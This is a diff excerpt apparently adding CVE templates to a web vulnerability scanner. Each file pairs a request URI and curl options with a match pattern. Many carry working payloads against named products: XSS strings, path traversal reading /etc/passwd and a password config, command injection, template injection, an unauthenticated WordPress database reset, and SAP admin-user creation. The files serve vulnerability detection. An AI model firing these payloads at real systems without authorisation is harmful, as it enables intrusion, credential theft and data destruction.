METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2140 - Jenkin AuditTrailPlugin XSS'
URI="/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s --insecure -L "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS'
URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E'
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-25213_-_WP_File_Manager_File_Upload.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-25213 - WP File Manager File Upload'
URI="/wp-content/plugins/wp-file-manager/readme.txt"
METHOD='GET'
MATCH="(Stable\stag\:\s[0-6]\.[0-8])"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2551_-_Unauthenticated_Oracle_WebLogic_Server_Remote_Code_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution'
URI='/console/login/LoginForm.jsp'
METHOD='GET'
MATCH="10\.3\.6\.0|12\.1\.3\.0|12\.2\.1\.3|12\.2\.1\.4"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE'
URI="/console/login/LoginForm.jsp"
METHOD='GET'
MATCH="WebLogic"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-3187 - Citrix Unauthenticated File Deletion'
URI="/+CSCOE+/session_password.html"
METHOD='GET'
MATCH="webvpn"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-3452_-_Cisco_ASA-FTD_Arbitrary_File_Reading_Vulnerability.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability'
URI='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
METHOD='GET'
MATCH="INTERNAL_PASSWORD_ENABLED|CONF_VIRTUAL_KEYBOARD"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal'
URI="/_next/static/../server/pages-manifest.json"
METHOD='GET'
MATCH='\{\"/_app\":\".*?_app\.js\"'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 1'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_3.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../Windows/win.ini"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix'
URI="/proxy.stream?origin=http://burpcollaborator.net/"
METHOD='GET'
MATCH="Burp\ Collaborator\ Server"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 1'
URI='/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp'
METHOD='GET'
MATCH='divGeneralRemoteSettingsTable'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS'
URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E'
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA'
URI="/CTCWebService/CTCWebServiceBean/ConfigServlet"
METHOD='POST'
MATCH="CTCWebServiceSi"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-7048_-_WP_Database_Reset_3.15_Unauthenticated_Database_Reset.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset'
URI='/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111'
METHOD='GET'
MATCH='X-Redirect-By\:\ WordPress'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -I"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution'
URI="/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
METHOD='GET'
MATCH='nonexistent'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution'
URI="/"
METHOD='GET'
MATCH='qdPM 9.'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access'
URI="/UploadTest.aspx"
METHOD='GET'
MATCH="content\-length\:\ 0"
SEVERITY='P2 - HIGH'
CURL_OPTS='-L -I --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

12
templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.py Normal file
View File

@@ -0,0 +1,12 @@
# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
import sys
from seleniumrequests import Firefox
url = sys.argv[1]
# Simple usage with built-in WebDrivers:
webdriver = Firefox()
response = webdriver.request('GET', '%s/www/delivery/afr.php?refresh=10000&")\',10000000);document.write(1+1336);setTimeout(\'alert("' % url)
if '1337' in response.text:
print("Vulnerable!")
webdriver.quit()

9
templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8115 - Revive Adserver XSS'
URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
METHOD='GET'
MATCH="\);alert\(1\);setTimeout\('alert\(\"&loc='"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8163 - Rails < 5.0.1 Remote Code Execution'
URI='/?system(%27echo+$((1%2B1787568))%27)%3ba%23'
METHOD='GET'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS'
URI="/menu/stapp"
METHOD='POST'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P1 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a</title><svg/onload=alert(1337)>&au=1&username=nsroot'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI'
URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
METHOD='POST'
MATCH="SESSID"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data '<appfwprofile><login></login></appfwprofile>'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection'
URI="/menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo"
METHOD='GET'
MATCH="<jnlp codebase=\"nonexistent.1337\">"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal'
URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Config_Password_Disclosure.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure'
URI='/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties'
METHOD='GET'
MATCH="database\.password"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal'
URI='/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8512_-_IceWarp_WebMail_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8512 - IceWarp WebMail XSS'
URI="/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"
METHOD='GET'
MATCH="<svg\/onload\=alert\(document\.domain\)>"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8772_-_IfiniteWP_Client_1.9.4.5_Authentication_Bypass_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8772 - InfiniteWP Client 1.9.4.5 - Authentication Bypass 1'
URI='/wp-admin/'
METHOD='POST'
MATCH="IWPHEADER"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' --data '_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ=='"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read'
URI="/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
METHOD='GET'
MATCH="bit\ app\ support"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s --insecure "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution'
URI="/version.web"
METHOD='GET'
MATCH="3\.10\.4\.72058|3\.12\.4\.76544|3\.8\.2\.67295|7\.0\.2\.81005|7\.2\.7\.86974|7\.4\.3\.89785|7\.6\.4\.94391|7\.8\.2\.97826|8\.0\.6\.105408|8\.2\.2\.107285|8\.4\.3\.111614|8\.6\.3\.116175|8\.8\.1\.118913|9\.0\.3\.124620|9\.2\.0\.127940|9\.4\.3\.137684|9\.6\.7\.145949|9\.8\.4\.149166|19\.03\.3\.152166|19\.06\.4\.157118|19\.09\.4\.0|19\.12\.2\.0|20\.03\.2\.0|20\.06\.3\.0"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution'
URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1787568))"
METHOD='GET'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9484 - Apache Tomcat RCE by deserialization'
URI="/index.jsp"
METHOD='GET'
MATCH='ObjectInputStream|PersistentManagerBase'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection'
URI="/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
METHOD='GET'
MATCH="22344"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Cisco_VPN_Login_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Cisco VPN Login Detected'
URI='/+CSCOE+/logon.html'
METHOD='GET'
MATCH="CSCO_Format"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Cisco_VPN_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Cisco VPN Detected'
URI='/+CSCOE+/win.js'
METHOD='GET'
MATCH="CSCO_WebVPN"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Citrix-Access-Gateway_Detected.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Citrix-Access-Gateway Detected'
URI='/vpn/index.html'
METHOD='GET'
MATCH='Netscaler Gateway'
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Citrix_VPN_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Citrix VPN Detected'
URI='/vpn/index.html'
METHOD='GET'
MATCH="Netscaler\ Gateway"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Citrix_VPN_Scanner_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Citrix VPN Detected 2'
URI='/vpn/index.html'
METHOD='GET'
MATCH="NetScaler "
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Clear-text_Communications_HTTP.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Clear-Text Protocol - HTTP'
URI='/'
METHOD='GET'
MATCH='200 OK'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

10
templates/active/Clickjacking.sh Normal file
View File

@@ -0,0 +1,10 @@
AUTHOR='@xer0dayz'
VULN_NAME='Clickjacking'
URI='/'
METHOD='GET'
MATCH='X-Frame-Options'
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -I"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
SEARCH="negative"

9
templates/active/Common_Status_File_Scanner_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 1'
URI='/.perf'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Common_Status_File_Scanner_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 2'
URI='/server-status'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Common_Status_File_Scanner_3.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 3'
URI='/status.html'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Confluence_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Atlassian Confluence Detected'
URI='/'
METHOD='GET'
MATCH="Atlassian\ Confluence"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

Some files were not shown because too many files have changed in this diff Show More